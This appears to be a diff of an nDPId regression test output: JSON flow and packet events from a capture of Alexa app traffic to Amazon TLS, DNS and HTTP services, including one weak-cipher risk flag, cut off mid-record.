+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1490976133936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1490976133936,"pkt":"AMDKkaPvePiC0\/vCCABFAABDWl9AAEARM1GsECrYrBAqARM4ADUALyGouR4BAAABAAAAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQAB"} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1490976134135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1490976134135,"pkt":"ePiC0\/vCAMDKkaPvCABFAADu5XxAAEARp4isECoBrBAq2AA1EzgA2tC0uR6BgAABAAkAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQABwAwABQABAAAAMQAfDmQxZ2Uwa2sxbDVrbXMwCmNsb3VkZnJvbnQDbmV0AMAzAAEAAQAAADsABDRUPzjAMwABAAEAAAA7AAQ0VD8QwDMAAQABAAAAOwAENFQ\/PcAzAAEAAQAAADsABDRUPxrAMwABAAEAAAA7AAQ0VD\/swDMAAQABAAAAOwAENFQ\/I8AzAAEAAQAAADsABDRUP9\/AMwABAAEAAAA7AAQ0VD\/n"} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1490976134141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134141,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xZVAAEAGKrKsECrYNFQ\/OMsSAFCeYrcjAAAAAKAC\/\/9o9QAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134144,"flow_last_seen":1490976134144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134144,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1490976134144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134144,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85X5AAEAGCsmsECrYNFQ\/OMsTAFDQ0pfIAAAAAKAC\/\/9V3wAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134146,"flow_last_seen":1490976134146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134146,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1490976134146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134146,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TQZAAEAGo0GsECrYNFQ\/OMsUAFAHRT+wAAAAAKAC\/\/93hAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134148,"flow_last_seen":1490976134148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134148,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1490976134148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134148,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8vDBAAEAGNBesECrYNFQ\/OMsVAFCK3c6GAAAAAKAC\/\/9lFAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134149,"flow_last_seen":1490976134149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1490976134149,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134149,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EjJAAEAG3hWsECrYNFQ\/OMsWAFAy6mCEAAAAAKAC\/\/8rCQAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2040,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1490976134198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134198,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxXC1q1Wit3Oh6AScSCcZgAAAgQFtAQCCAps+npUAPZytgEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2041,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxSwmxNdB0U\/saAScSBYswAAAgQFtAQCCAps+nysAPZytgEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2042,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxG999POw2qqP6AScSBjDwAAAgQFtAQCCAps+n3SAPZytQEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 